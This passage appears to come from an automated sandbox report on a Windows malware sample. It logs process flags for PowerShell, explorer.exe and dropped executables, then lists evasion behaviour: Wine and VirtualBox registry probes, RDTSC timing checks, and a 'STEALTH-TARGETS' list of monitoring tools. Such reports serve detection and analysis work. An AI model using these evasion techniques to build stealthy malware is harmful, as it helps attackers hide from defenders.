                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                            Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-12183
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9690
                            Query firmware table information (likely to detect VMs)
                            Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSystem information queried: FirmwareTableInformation
                            Tries to detect sandboxes / dynamic malware analysis system (registry check)
                            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: explorer.exe, 00000017.00000003.2664467654.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                            Source: explorer.exe, 00000017.00000003.3848708673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2667541330.000000000086D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE1.0\
                            Source: sUSFJjY.exe, 00000006.00000002.2619824711.0000026950D01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                            Source: explorer.exe, 00000017.00000003.2664467654.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEG
                            Source: explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2639962295.00000000008AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
                            Source: explorer.exe, 00000017.00000003.3848708673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2667541330.000000000086D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                            Tries to detect virtualization through RDTSC time measurements
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109BF43 second address: 109BF47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109BF47 second address: 109BF4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF13F second address: 10AF157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAC1684462h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF2A1 second address: 10AF2D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 jmp 00007FFAC0BDB46Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007FFAC0BDB471h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AF428 second address: 10AF42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
